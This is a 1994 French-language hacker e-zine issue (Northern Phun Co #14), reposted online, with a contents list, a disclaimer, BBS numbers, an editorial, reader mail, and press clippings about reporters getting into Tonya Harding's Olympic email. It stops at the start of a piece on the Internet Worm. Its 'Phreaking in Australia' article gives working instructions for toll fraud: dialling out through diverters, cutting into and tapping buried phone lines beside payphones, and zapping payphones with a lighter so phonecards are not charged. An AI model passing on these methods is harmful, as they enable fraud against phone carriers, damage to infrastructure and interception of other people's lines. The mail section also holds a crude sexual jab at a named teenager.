Copy Link
Add to Bookmark
Report

Northern Phun Co Issue 14

eZine's profile picture
Published in 
Northern Phun Co
 · 11 Oct 2020

  

_____ ._______________________________. .___________________________ ._____
\_, \ | ____________ < ________. | | .______ )_____ \_, \ | __/
| \| o| / \ | | ) /\( | | __|__|_|__|_|__|_) / | | ) / | \| o|
| . ` :|/ . \| |/ / ` | | \__________________/ | |/ / | . ` :|
|: |\. / /| |: |\ \ |: | |. | | | |. | ____ |: |\ \ |: |\. |
|o | | ( (_| |o | \ \ |o | |o | | | |o |/ __/ |o | \ \ |o | | |
|__| | \__\___| | \ > | | |__| | | |_ ' / | | \ >|__| | |
\ | | / \/ | / \ | \ | | / \/ \ |
\| |/ |/ \| \| |/ \|
: : : : : : :
_____________. .__. ._______ ._____ ___________
\______ ) | | | | ._. \ | __/ \______ ) __
__| |_) / |_|__|_/\ | o| | \| o| | | ) / / \
\_, .___/| .______ \| :| | . ` :| | | \_/ / , \
|: | |: | | |/ /| | |: |\ | |: | ___/. /| \
|o | |o | | / (_| | |o | \ | __|o |_) (o (_| ) _
| | |__| | <_________>|__| | | \_, _____\__\___/ (_)
| / \ | \ | | /
|/ \| \| |/
: : : :
askee &
shit by
MENTAL FL0SS



-----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
-----------------------------------------------------------------


N O R T H E R N P H U N C O .

N U M  R O Q U A T O R Z E ú P R E M I E R M A R S 9 4


Dans ce quatorziŠme num‚ro de NPC:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ú
:
|
- -ÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-- - ú
³ +:SUJET:+ ³ +:AUTEUR:+ ³
³ú - -ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ú - -ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ Table des matiŠres / Disclaimer ³ -=ThE PoSSe=- ³
³ ditorial de NPC #14 ³ Atreid Bevatron ³
³ The postman always quote twice ³ Votre Courrier ³
³ Phreaking in Australia ³ Crime Lord (Fultz) ³
³ Harding: Des journalistes/hackers? ³ SubHuman Punisher ³
@³ Warning, Worm! ³ Blitzkreig ³
@³ OmniBox, the little multi-box! ³ Atreid Bevatron ³
³ Blue Box back then! ³ Kermit ³
³ To root or not to root ³ Gurney Halleck ³
³ Nos universit‚s, fleuron du caCanada³ Subhuman Punisher ³
³ Fiction et Cie: Mirrorshades Mindy ³ Stefan Gagne ³
³ Read the news... ³ -=ThE PoSSe=- ³
@³ Hackers for Bob! ³ Gurney Halleck ³
ú - --ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅ
³
@ Renferme un programme uuencod‚ |
:
ú

NPC are: Officiers Collaborateurs

diteur:-Atreid Bevatron- Messerschmitt
Kermit Paranoid
Blitzkreig Pawa
Santa Claus
The SubHuman Punisher
Gurney Halleck
Crime Lord
Mental Floss



DISCLAIMER - AVERTISSEMENT

Ce magazine n'est pas recommand‚ aux gens qui portent un
Pacemaker, aux ƒmes sensibles, et aux moralisateurs. Tenez-vous
le pour dit, et abstenez-vous!

Ceci va probablement ˆtre le disclaimer le plus long de
l'histoire des magazines underground car, sur les conseils de
gens g‚n‚ralement bien vers‚s dans le domaine (vous savez que les
avocats r‚clament 150$ de l'heure? Chi‚!) une mise au point
exhaustive doit ˆtre faite avant de vous permettre de poursuivre
votre lecture (et non pas de poursuivre Northern Phun Co.: vous
ˆtes pas dr“les!).

1) Tous les articles de ce magazine ne sont publi‚s qu'… titre
d'information. L'application de une ou des technique(s)
expliqu‚e(s) dans ces pages peuvent entraŒner la mort, des
blessures s‚rieuses, l'impuissance, la perte de votre virginit‚,
des poursuites judiciaires embˆtantes, le bris de votre
ordinateur, la nomination de Camil Samson … la tˆte du Parti
Lib‚ral ou, pire encore, vous pourriez devenir comme vos parents!

2) Northern Phun Co., qui est un organisme … but non-lucratif,
avec une vocation quasiment philanthropique, ne sera en aucun
temps tenu pour responsable de l'irresponsabilit‚ des auteurs qui
publient des articles dans ces pages. L'entiŠre responsabilit‚,
et la preuve de la v‚racit‚ desdits articles, revient aux
auteurs. On est mal parti, l…, les enfants...

3) Les officiers clairement identifi‚s de Northern Phun Co. sont
seuls habilit‚s … parler au nom du groupe, et NPC ne serait ˆtre
tenu pour responsable de la conduite (ou de l'inconduite) des
collaborateurs de NPC sur les babs de la planŠte Terre. De plus,
seuls les textes des officiers de Northern Phun Co. sont v‚rifi‚s
pour leur exactitude.

4) La lecture de Northern Phun Co., quoique r‚jouissante, peut
entraŒner aussi des problŠmes de sant‚ mentale et des cas de
pilosit‚ manuelle.

5) Northern Phun Co accepte, … priori, de publier tous les textes
touchant au H/P/C/A/V-et-le-reste qui lui seront soumis. NPC
refusera, par contre, tout texte encourageant la discrimination
d'une ou des personne(s) en fonction de leur origines ethniques,
de leur religion ou de leur sexe. Si vous voulez bouffer du
nŠgre, engagez-vous plut“t dans la police...

6) Northern Phun Co. tient … rappeler … ses lecteurs qu'il faut
soigneusement se brosser les dents aprŠs chaque repas. Et
n'oubliez pas la soie dentaire!

Est-ce que ‡a suffit l…?


O— nous rejoindre?
------------------

D– … la nature "volatile" de notre produit, les babs qui nous
supportent le sont tout aussi. Ceci dit:

Vous avez toutes les chances de pogner un des officiers de NPC
sur les babs PUBLICS suivants (on pousse la perversion jusque
l…!).

Light BBS : 418-651-5664
Black Palace : 418-831-1602
The Cannibal Cookhouse : 418-657-4442
Terminus (Baie-Comeau ) : 418-295-2854
OverBoard (Sherbrooke) : 819-569-7239
Utopian Refuge (Montr‚al) : 514-279-6465 (login :ae)
(password:ae)


Et un petit gros bien bon nouveau, un bon copain hollandais
recrut‚ par Gurney:

Arrested Development (Hollande!) : +31-77-547477


Un beau fou de Drummondville nous a consacr‚ son babillard.
Ouvrez grands vos yeux! Si vous savez compter, ‡a fait -7- nodes!

La Station: 819-474-8010
6158
7601
2016
7475
1816
5239


Il y a aussi un bab qui vous offre une messagerie anonyme pour
NPC, comme au bon vieux temps de M‚dic!

The Inferno: 418-647-2731

Si votre babillard public (hors 418) d‚sire ouvrir une section
NPC, n'h‚sitez pas … nous contacter. C'est gratuit!

Nous sommes aussi (naturellement) sur les boards pirates de
Qu‚bec. En fait, sur Workshop, il y a tous les officiers de NPC
qui prennent un bain de soleil... C'est comme qui dirait notre
H.Q. underground.

Nous ne publions plus de numero de VMB. D‚sol‚, mais on les
perdait … mesure qu'on les publiait, alors... Un coup des coches,
je suppose...

Nous avons aussi une adresse Internet pour e-mail:

npc@sietch.ci.net

Vous pouvez trouver NPC (ze magz) sur plein de boards Internet.
Par exemple, faites un ftp sur:

etxt.archive.umich.edu

Et allez dans la section /pub/Zines/NPC


Et si malgr‚ tout ‡a vous n'ˆtes pas capable de nous rejoindre,
appelez l'Arm‚e du Salut, et demandez Roger...


-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------

Obiwan Kennobi, vous
ˆtes mon seul espoir...


DITORIAL #14

par

Atreid Bevatron


Nie Nie Nie, Nie zabia‹mniŠ! Ici Atreid, de retour en ce
quatorziŠme num‚ro de Northern Phun Co, aprŠs une courte absence
au dernier num‚ro, o— le pauvre Blitz a d– faire fumer son
clavier … la toute derniŠre minute. Je ne crois pas qu'il l'ait
appr‚ci‚ d'ailleurs... ;-) Pendant ce temps, moi, j'ai pass‚ plus
de 40 heures en une semaine … pr‚parer des animations vid‚os pour
annoncer les DJs au MASCARADE rave du 4 f‚vrier dernier, au Mus‚e
de la Civilisation de Qu‚bec. Un rave qui ‚tait, soi dit-en
passant, tout … fait g‚nial!

TrŠve d'anneries de toutes sortes et passons au menu
principal... Encore plein de choses complŠtement allumantes en ce
quatorziŠme num‚ro de NPC.

Deux nouveaux babillards se sont joints … nous pour nous
repr‚senter. Utopian Refuge dans le 514, dont le sysop est
MasterTronics, qui ‚crivit un petit article dans le num‚ro 13.
Aussi, Arrested Development, un incroyable babillard en HOLLANDE,
riche et prospŠre pays des Pays-Bas, nous consacre une section
NPC, un outil int‚ressant pour notre diffusion en Europe. Le tout
sans oublier Internet, par lequel vous pouvez depuis quelques
mois vous procurer NPC. Les num‚ros et le site internet sont
juste avant l'‚ditorial, jetez-y un coup d'oeil et venez nous
visiter dans n'importe lequel des babillards NPC!

Au risque de me r‚p‚ter, LLC is coming, and is coming faster
than ever! On ne peut plus reculer maintenant, le plus long est
fait et il ne reste plus que quelques formalit‚s qui, je
l'espŠre, seront r‚gl‚es dans les plus brefs d‚lais...

Dans ce num‚ro, pour continuer dans nos habitudes, pleins de
choses effroyablement int‚ressantes. Le fameux .Gif Hackers For
Bob, connu maintenant pour tous les hackers sur le Net. Le trŠs
fameux WORM qui paralysa Internet pendant quelques temps. Vous
cherchiez les bruits de blue, green, red et silver box, ne
cherchez plus, un petit programme les propulsera … travers votre
SoundBlaster. Un r‚pertoire trŠs int‚ressant de presque TOUS les
dialups des systŠmes des Universit‚s canadiennes par SubHuman
Punisher. Vous d‚testez les journalistes des mass m‚dia, vous les
d‚testerez encore plus aprŠs avoir lu l'article sur le E-Mail de
la patineuse Harding.


Aussi, nous avons deux retour au bercail d'anciens
officiers.

L'un, Mental Floss, revient physiquement dans la vieille
capitale, mais les d‚m‚nageurs ont ‚chapp‚ une laveuse sur son
clavier alors vous verrez quelques articles de lui seulement au
prochain num‚ro. Il m'a promis de parler, avec l'humour tueur qui
lui est propre, du 'fameux' Hellraiser, de Karl Kirouac et du
trŠs peu fameux Robert Bertrand, sysop du encore moins fameux
Renouveau Politique. Je suis s–r que vous vous ennuyez tous de
l'humour de Mental, et je trouve ‡a bien de le voir rentrer … la
maison, aprŠs un p‚riple ‚prouvant dans le d‚sert de
Chicoutimi...

L'autre retour, de Crime Lord, n'est pas physique, car il
est encore en Australie, mais ses articles sont de retour par
contre. Il nous revient avec un article trŠs instructif qui nous
renseigne un peu sur la vie des phreakers d'Australie... Il nous
a d'ailleurs promis une suite, en plus d'un article sur le
Australian/Hacking!

Une petite contribution de Messerschmitt, un pote de
Montr‚al, qui nous a tap‚ quelques textes. Nous l'appr‚cions, et
je rappelle que nous appr‚cions toujours toute contribution
ext‚rieur...


Je vous rappelle que vous avez d‚sormais besoin d'un outil
essentiel pour profiter de NPC au maximum. Il s'agit de UUENCODE,
plus pr‚cisement UUDECODE, puisque les programmes que nous
d‚sirons faire circuler font maintenant partie int‚grante de NPC,
comme ‡a vous ne vous retrouverez pas avec une archive incomplŠte
dans laquelle il manquerait certains programmes p‚riph‚riques...
En passant, si vous faites imprimer NPC, je vous conseille
fortement de couper dans les parties uuencod‚es... ;-) Sauf si
vous aimez gaspiller du papier...


Un petit commentaire de ma part... J'ai re‡u il y a quelques
jours un appel assez curieux. Une personne que je me plais …
appeler Greg m'a contact‚ en pleine nuit sans rien dire au
t‚l‚phone et en le rappelant avec *69, je lui ai finalement fait
gober qu'il devrait faire ATX3D et moi ATA et nous nous sommes
connect‚s par modem, finalement. Il s'agissait d'une sorte de
d‚tective de 19 ans … qui une personne a demand‚ de me trouver.
Deux minutes plus tard, je re‡ois un appel, toujours anonyme …
1:30 am, et il me dit que ‡a fait longtemps qu'il me cherche
(pourtant je ne suis pas difficile … trouver!) et vous savez
pourquoi? Il me dit: ®Je cherche des num‚ros de cartes de
cr‚dit...¯ Bordel! Des gens m'appellent … une heure du matin, ne
disent pas qui ils sont et me demandent des num‚ros de cartes de
cr‚dit? Merde, mais qu'est-ce que c'est que ces conneries?!? Un
flic un peu con ou un adolescent complŠtement stupide? Pas la
peine de vous dire que ses num‚ros de cartes de cr‚dit, il peut
se les foutre o— je pense! Il m'a mˆme dit comment il allait
proc‚der pour sa petite crosse, pas croyable hein? Si tu me lis,
toi, laisse-moi te dire que j'ai repens‚ … ta strat‚gie, et
qu'elle est complŠtement NULLE tu m'entends, tu lis bien l…,
c'est COMPLETEMENT NUL! Je ne conseillerais mˆme pas cette
strat‚gie … mon pire ennemi... Tu m'as parl‚ de quelque chose que
tu allais louer pour ‡a, et bien laisse-moi te poser une
question... Tu vas la louer pendant une semaine ou quoi? Si ‡a
marche pas, ‡a t'auras co–t‚ cher pas mal! Laisse-moi te dire que
les dates de drop, c'est de la merde, parce que c'est jamais
pr‚cis, alors c'est pour ‡a que tu devras la louer pendant une
semaine.
J'ai essayer de ne rien r‚v‚ler de crucial quand mˆme,
puisque la GRC nous lit attentivement. Je te souhaite bonne
chance... J'irai t'apporter des oranges...


Je vous laisse sur ce continuer votre lecture du QuatorziŠme
num‚ro de Northern Phun Co., avec une petite plogue personnelle:

*****************************************************************
Si vous ˆtes int‚ress‚s … avoir de l'animation vid‚o
personnalis‚e par ordinateur pour un party, une soir‚e ou de
pr‚f‚rence un RAVE, moi et mon pote White Wizard sommes l… pour
‡a. Nous sommes les VIRTUAL GIZMOS. Si ‡a vous int‚resse, z'avez
qu'… me contacter par n'importe quel bbs NPC ou par l'adresse
Internet officiel de NPC: npc@sietch.ci.net
*****************************************************************


Rave On, Rave Hard!


-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------

THE POSTMAN ALWAYS QUOTE TWICE!

by

-=ThE PoSSe=-



Section Message (NPC) Message #1313 (Msg Public)
Date : 19-01-94 02:23 (Re‡u le 27-02-94 13:56)
De : Billy The Kid
… : Atreid Bevatron
Sujet : Hargh!
1256 <==> 1379

Salut

AB> Bon... Enfin j'ai eu la ligne...

Ha!.. Au moin je ne suis pas le seul a ne pouvoir me connecter
ici. A moin qu'on ne sois en Reseau?.. enfin..

Bon Je t'ecris cette simple petite lettre pour te dire quelque
commentaire de ma part, Premierement je suis a Laval. Tu dois pas
vraiment avoir de commentaire de la non?.. enfin..
Je lisais dans ton NPC. Bref les derniers Il y avais.. un gros
signe de desespoire... aussi parce-que tu n'avais pas recu
beaucoup de carte de noel et tout le kit de LLC ?.. (LLC Je
connais pas grand chose la dessu si tu veux me repondre c'est
quoi au juste!) enfin.. Je voudrais juste te dire a toi et a
tout les autres que J'adore purement et simplement votre
magasine. et que je ne suis pas le seul. Il est imprimer et
carement lus par une vingtaine de personnes de mon... "Entourage"
bref si tu ne recois pas souvens de courrier c'est peut-etre
parce-que le monde son.. "cacher"? non sans farce.. c'est
comme moi je vous trouve simplement super mais.. J'ai jamais
l'occasion de le faire.. enfin..

Parlons autre chose, Je suis au Cegep (je rentre dans une
semaine) en informatique.. L'informatique me pasionne.. je trouve
les ordinateurs trop puissant et je sais pas.. genre ca semble
facile les controlers.. (pas facile dans le sense t'as rien a
faire mais.. ) Tu parles souvens de Hacking.. Hacking de MailBox
etc. Moi dans ma tete du Hack de VMB c'est tu peses sur un pitons
quand y faut pas!. et Utiliser une faiblesse de system pour lui
ordonner quelque chose.. (je me trompe?)
Je donne un exemple, J'ai entendu quelque part que quelqu'un
pourrais facilement aller dans le dos de ton ordinateur par
modem, parce-qu'il y a un moment de faiblesse entre le moment ou
ton modem fait du bruit et le moment ou il est inscris CONNECT
14400 ou qqch.. pour lui envoyer une commande!.. c'est ca que
j'aimerais savoir!.

Humm... ma lettre est pas mal Longue pour te dire les 3 choses
suivantes 1- Bravo pour le Mag. Y a plus de monde que tu crois
qui te suive.

2- Pourais tu me parler plus en details du Hacking, (pas des
trucs) mais des definitions

3- Me parler de LLC, des reunions etc... c'est quoi le but que tu
cherches a atteindre?.. etc.. !. c'est tout!.

J'avais raisons la lettre est longue pour rien hein.. enfin!.

Y faut pas en demander trop il est 2 heures 30 du matins pis je
reviens d'un Party chez des amis alors je suis un peu fucker..
a la prochaine...

Nous Vaincrons!
Billy The Kid


[Atreid- En fait, hacker une VMB n'est PAS hacker avec une
faiblesse du systŠme (sauf exception evidemment)... Lorsque tu
hack une VMB, tu utilises les fonctions normales de la VMB. Tout
ce que tu utilises, ce sont les faiblesses de la s‚curit‚ du
systŠme, et non un bug du systŠme. A ma connaissance, mˆme s'il
arrive que dans le monde du hacking, des techniques se fondent
sur des BUGs du systŠme, ce genre de techniques restent
‚ph‚mŠres, puisque … court ou moyen terme, le BUG est notifi‚ et
corrig‚ dans les plus brefs d‚lais. Pour ce qui est des
faiblesses dans la s‚curit‚ du systŠme, tous les sysadmins savent
trŠs bien que laisser le root sans password est vraiment stupide
et dangereux et pourtant, certains continuent dans cette voie et
ce n'est pas un update du programme qui va arranger ‡a...
Pour ce qui est du bug de modem 14.4k, je doute fort que ce
soit vrai, car mˆme l…, il devrait exister une complicit‚ entre
le modem et le logiciel de communication, puisque seul le
logiciel de communication pourrait faire sheller l'appelant vers
le DOS... D'ailleurs, je ne crois pas qu'un tel bug existe en ce
monde...
Pour ce qui est de la d‚finition du hacking, je vais peut-
ˆtre explorer ‡a un peu pour un prochain article. Style: Histoire
du hacking, origine, etc... Bah... On peut toujours essayer...;)
Pour ce qui est du but de LLC, l… je te suis pas, mais alors
vraiment pas! €a fait au moins une bonne dizaine d'article que
nous publions sur LLC dans NPC... Vient pas me dire que tu peux
pas trouver ce que tu cherches l…-dedans!
Merci de nous avoir ‚crit, merci pour tes louanges, merci
pour tes encouragements et merci pour la recette de muffins au
thon de ta grand-mŠre...]


------------------------------


Message #6/6 in Conf‚rence Npc (Pri) - Local - [Local]
Info : [PRIVATE]
From : Jumping Kid [POST 12-Feb-1994 21:13]
To : Atreid Bevatron [RCVD 20-Feb-1994 01:29]
Subject: Yo!
Hello!


T'as tu access sur the hidden zone (4i8)683-2066, tu me
dissais de te le dire si j'avais quelque probleme... va voir la
tu va voir! (et tu remarqueras que c'est toute RED KHMER qui
upload les fichiers sur moi et qui fait les VOTES/MSG!) Tk... tu
m'en reparleras!

Jk! <aka Karl Kirouac>
<aka Nazgul>


[Atreid- C'est vraiment m‚chant ce qu'il... QUOI? Qu'est-ce que
tu dis THX? Tu veux faire un commentaire sur ‡a, bon... TrŠs
bien... Je sais bien que tout le monde aime bien connaŒtre ton
point de vue...]

[THX 1138- Maintenant vous savez tous o— appeler pour rire de ce
tarr‚!]

[R‚al GiguŠre- Il est app‚tissant ce petit adolescent...]


-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------

OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ

Phreaking in Australia
de
Fultz <Crime Lord>

OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ.OZ

Hey m8.
Ceux qui ne savent pas de quoi a l'air la scene H/P en Australie,
vous devriez peut-ˆtre lire cet article. Vous d‚couvrirez comment fonctionnent
nos moyens de communication, soient les Bridges, Loops, Diverters, PBX et VMB.

Pour ˆtre franc avec vous, la scŠne ressemble ‚trangement … celle de Qu‚bec.
Je me suis fais dire par mes nouveaux complices que la scŠne est morte depuis
deux ans, mais devrait revenir en force d'ici 1995. Je me suis vite rendu
compte qu'il n'y avait vraiment pas beaucoup de Hackers/Phreakers en Australie.
C'est pour cette raison qu'elle est si bien gard‚e. Pour me faire reconnaŒtre
comme ‚tant un hacker/phreaker … Sydney, il m'a fallu rencontrer une personne
de la scŠne et aprŠs quelques questions, le fun a commenc‚.

Alors, voici donc la premiŠre ‚tape qu'il a fallu que je connaisse dŠs le
d‚part. Le systŠme t‚l‚phonique est contr“l‚ par Telecome & Optus. Optus ‚tant
con‡u uniquement pour les appels Os (Over-seas). Et Telecome qui s'occupe des
appels locaux et Os. Pour vous enlever le go–t de venir hacker en Australie,
tous les appels locaux co–tent 25c/call. Alors pensez y bien. Je suis rest‚
bˆte aprŠs ma premiŠre facture. Mes appels normaux par jour ‚taient de 50 mais
rendu ici, je me contente de rester dans les 4-8 par jour.

Maintenant que vous connaissez les tarifs locaux, vous comprenez que pour un
hacker situ‚ en Australie, les 1-800 sont trŠs populaire, mais il ne faut pas
se tromper ici. Comme vous connaissez, les appels gratuits … Qu‚bec ont le
format suivant: 1-800-XXX-YYYY et bien ceux d'ici sont l‚gŠrement diff‚rents.
Nous avons les formats suivants: 0014-800-XXX-YYY
1-800-XXX-YYY
008-XXX-YYY

Et nous avons les "Test Numbers" que l'on retrouve … 19XXX. Un exemple pourrait
ˆtre celui du 19123 qui nous dit le num‚ro de notre propre ligne. Il y a aussi
les 1818 et 1811 qui utilisent les cartes de cr‚dit et les cartes d'appels.

Pour vous, rejoindre un num‚ro 1-800 d'am‚rique est simple. Ici, nous avons …
passer par de nombreux chemins. Le plus cours est celui du bon vieux pbx 1-800
Mais vous me direz, comment out-dialer du PBX qui est en Australie si de ta
propre maison tu ne peux pas rejoindre les num‚ros 1-800 d'Am‚rique. Et bien,
la r‚ponse … cette question est la suivante: la plupart des 0014-800-XXX-YYY
sont des compagnies ‚trangŠres, soient OS. Je m'explique, si une compagnie
auvait le go–t d'ˆtre rejoint d'Australie, elle pourrait demander au systŠme
t‚l‚phonique australien de lui monter une ligne 0014-800-XXX-YYY, mais que tous
les appels soient redirig‚s vers elle. C'est pour cela que les PBXs que nous
utilisons, sont en fait des PBX d'Am‚rique. Et pour appeller un
0014-800-XXX-YYY d'une cabine t‚l‚phonique, il nous faut changer le format ex:

Le num‚ro 0014-800-126-018 (VMB) deviendrait 1-800-126-018. Simple vous me
direz? Et bien, c'est ce que vous croyez car le format des 0014-800-XXX-YYY
n'est vraiment pas si simple que cela puisque vous pouvez rejoindre une
compagnie en appelant au 0014-800-XXX. Alors essayez de me traduire cela en
fromat 1-800.

Et nous avons aussi les Bridges. Si vous ne savez pas ce qu'est un Bridge, je
vous dirais que c'est un endroit ou tous les appels faits … un certain num‚ro
se connectent ensemble. Nous utilisons ceux-ci pour ‚changer sur diff‚rents
sujets.
La plupart des Hacker/Phreaker appellent ces bridges une … deux fois par
semaine pour y voir ce qui se passe dans les autres r‚gions. Comme partout
ailleurs, il y a toujours des fissures et de ce fait, nous avons nos fameux
morons qui se disent ˆtre 313313 en faisant du MailBomb sur le Bridge. Je vous
parlerai du MailBomb plus tard dans la section VMB. Mais pour revenir … notre
sujet, les bridges sont des bons endroits pour se faire des contacts. Le bridge
que nous utilisons en ce moment n'est pas 1-800. C'est pour cela que les
diverters sont trŠs pratiques pour contacter les bridges locaux.

En parlant de diverters, voici comment nous les utilisons. La majorit‚ des
diverters se retrouve dans les 008-0XX-YYY. Le principe est simple, il suffit
d'en appeler un d'une cabine t‚l‚phonique. DŠs que vous entendez le premier
RING, vous n'avez plus qu'… composer le num‚ro que vous voulez rejoindre. Si
le principe est simple, cela ne veut pas dire que la m‚thode est aussi simple.
Ok pour les appels locaux ou, moins de 9 chiffres. Mais quand on se retrouve
avec un num‚ro de plus de 15 chiffres, tu trouves le temps court. Car il faut
entrer le num‚ro que l'on veut appeler avant le 3e ring. (Plupart des cas)
C'est dans ces situations o— le Tone Dialer de Tandy (Radio Shack au Canada)
vient faire son apparition. J'utilise le 43-114 (Data Bank Pocket Dialer).
Il fonctionne … merveille sous ces conditions, car il est muni de m‚moire
alors il te reste seulement … entrer ton num‚ro OS dans l'appareil et ensuite
appeler le Diverter et presser la touche du num‚ro que vous venez d'entrer.
Et le Tone Dialer fera le reste pour vous car il a une vitesse de dial
sup‚rieur … celle de mes doigts sur le Keypad du t‚l‚phone public. Un
exemple pourrait ˆtre comme suit:

Diverter Tone Dialer Connection
(Num‚ro En M‚moire)

008-032-811 RING 0011-1-418-123-4567 RING Salut Kermit!

Un autre moyen utilis‚ en OZ pour appeler gratuitement est celui du "Pit".
Comment utiliser la methode du "Pit"? Et bien, ici, la plupart des lignes
t‚l‚phoniques sont situ‚es sous la terre. Donc, il doit y avoir surement des
points de sortie et d'entr‚e. Le "Pit" est cette entr‚e et sortie. Les "Pits"
sont situ‚s partout … travers la ville, soit devant la maison … laquelle
correspond la ligne en question ou bien trŠs rapproch‚ des poteaux de
t‚l‚phone. Le truc est de lever le couvercle (ciment - non barr‚) qui est situ‚
au niveau de la terre et de couper le cable noir pour enfin y brancher votre
portable ou t‚l‚phone sur cette ligne. Pour ˆtre "safe", nous utilisons les
"Pits" … c“t‚ des t‚l‚phones publics, ce qui nous permet d'utiliser la ligne
de Telecom et ne pas se faire pogner … utiliser la ligne d'un client s'il vient
… d‚crocher sa propre ligne et qu'il d‚couvre que nous sommes dessus. Ca me
fait penser... TrŠs bon moyen pour taper une ligne t‚l‚phonique c'est "Pits".

Le t‚l‚phone public est l'un des endroits les plus "safe" pour nous alors, nous
avons ‚t‚ oblig‚s de trouver des moyens ing‚nieux pour l'utiliser gratuitement.
L'un de ces moyens est d'utiliser une "PhoneCard" qui se vend dans tous les
d‚panneurs du coin au prix de 5, 10, 20 et 50$. Ins‚rer votre nouvelle carte
dans le gentil "payphone" et faire votre appel. Ensuite, zapper le receiver et
votre carte d'appel sera ‚ject‚e de la machine sans avoir ‚t‚ utilis‚e. Le but
de Zapper l'appereil est de faire croire au t‚l‚phone que votre carte n'est
plus bonne et de ce fait, il la rejette et coupe la communication sans faire de
changement au magn‚tique de la carte. Un Zapper est un simple allume B.B.Q. ou
briquet utilisant un choc ‚lectrique pour allumer le gaz. Lorsque vous
utilisez ce truc, je vous conseillerais d'acheter une "PhoneCard" de 50$ car
si vous d‚passer la limite de votre carte, elle se fera mettre … 0 par le
t‚l‚phone public et vous aurez d‚pens‚ tout votre argent sur un appel.
Dernier conseil concernant le Zapping. Vous devez toujours ˆtre le premier
… Zapper et raccrocher, car si votre copain raccroche avant vous, vous aurez
perdu le montant de l'appel.

Je sais que je n'ai pas tout expliqu‚ mais comme vous pouvez le voir, je
commence a radotter. Il y aura une deuxiŠme partie … cet article sur le
Phreak. Et une autre sur le Hacking en Australie plus tard.

C'ya from dOWNuNDER.
Fultz <Crime Lord>

[Atreid- Deux autres articles? Oh non! €a m'a pris une demie-heure pour
corriger les fautes juste pour celui-l…! :) Au moins ils en valent la peine!]


-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------

TONYA HARDING ET LES HACKERS!

par The Subhuman Punisher


Yo! Check this piece of info out!

----------------

The Dallas Morning News reported Thursday that Michelle Kaufman
of the Free Press, Ann Killion of the San Jose Mercury News and
Jere Longman of The New York Times read Harding's e-mail access
code off of her credentials shown in an enlarged shot on
television. The Olympic system's default structure assigns the
user's birthdate as the user's password until he or she changes
it; apparently Harding never did. So the reporters had her
account name and password. They say that at 2 a.m. they logged in
to her account, saw that there were 68 messages, and logged out.
They said they were simply trying to see if their efforts had
worked.

Friday, after The News' story was picked up by KRT and
distributed worldwide, other reporters 'fessed up to having
cracked Harding's e-mail. Among them was Dave Barry, who
expressed outrage that anyone would be offended by what the
reporters did. Another reporter told The News that the breach was
innocent in that it was analogous to a reporter's looking on a
source's desk and ``reading a letter upside down.'' The
reporter's committee responsible for credentials in Lillehammer
plans to take no action; the Free Press and the Mercury News
backed their reporters; the Times would make no comment.

-----------------

Des journalistes hackent un acompte de e-mail, et, selon
eux, c'est ben correct... Mais si c'‚tait un kid, hein...
Toujours deux poids deux mesures. Saloperie de soci‚t‚...

Une autre coupure de journal sur ce sujet...

-----------------

NOT EVEN HARDING'S MAIL SAFE
REPORTERS BREAK INTO HER ELECTRONIC MAIL SYSTEM
Reporter: John Husar, Tribune Staff Writer
(From: Chicago Tribune, 26 Feb, 1994 (Sect 3, p. 7))

LILLEHAMMER, Norway--In what was described as a "stupid,
foolish mistake," perhaps as many as 100 American
journalists peeked into figure skater Tonya Harding's
private electronic mailbox at the Olympics.

According to the story, no one claimed to have read the story or used
the information. One reporter, Michelle Kaufman of the Detroit Free
Press, explained that the offense was a "spur-of-the moment" incident
that occurred after pizza at 2 a.m. According to Kaufman, the reporters
merely attempted to see if a code, reputed to be Tonya's, would work.

The story explains that an electronic information system is available
to all members of the "Olympic family" of coaches, athletes,
journalists, and others. The electronic system provides information
(weather, sports, news) and allows for sending or receiving messages.

The story explains that a double code is required to access messages:
One is the user's Olympic accreditation number, and the other the
secret password. The initial password is the user's birthdate.
Harding's accreditation number was retrieved from an enlarged photo of
her wearing an official Olympic ID tag. Her birthdate is readily
available from publicity and other sources.

Kaufman said she and a few others found that the code did
gain access to Harding's mailbox. A sign reported 68 unread
messages for Harding.

"But we never opened any messages," Kaufman said. "There were
none sent under her name. We made a joke--something about
her not being smart enough to figure out how to get her
mail--and closed the file and walked away. It couldn't have
lasted for more than a minute."

The story identifies Ann Killion of the San Jose Mercury News and
Jerry Longman of the New York Times as being among the group. Both
denied reading Harding's messages.

Mike Moran, head of the U.S. Olympic Committee's
information section, said he considered the situation an
ethical matter for journalists to settle rather than
anything that would require any kind of official reaction.



-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------

Robert Tippett Morris rides again!

THE INFAMOUS INTERNET WORM

intro par Blitzkreig

A ce moment-ci de votre apprentissage, chers lecteurs, vous
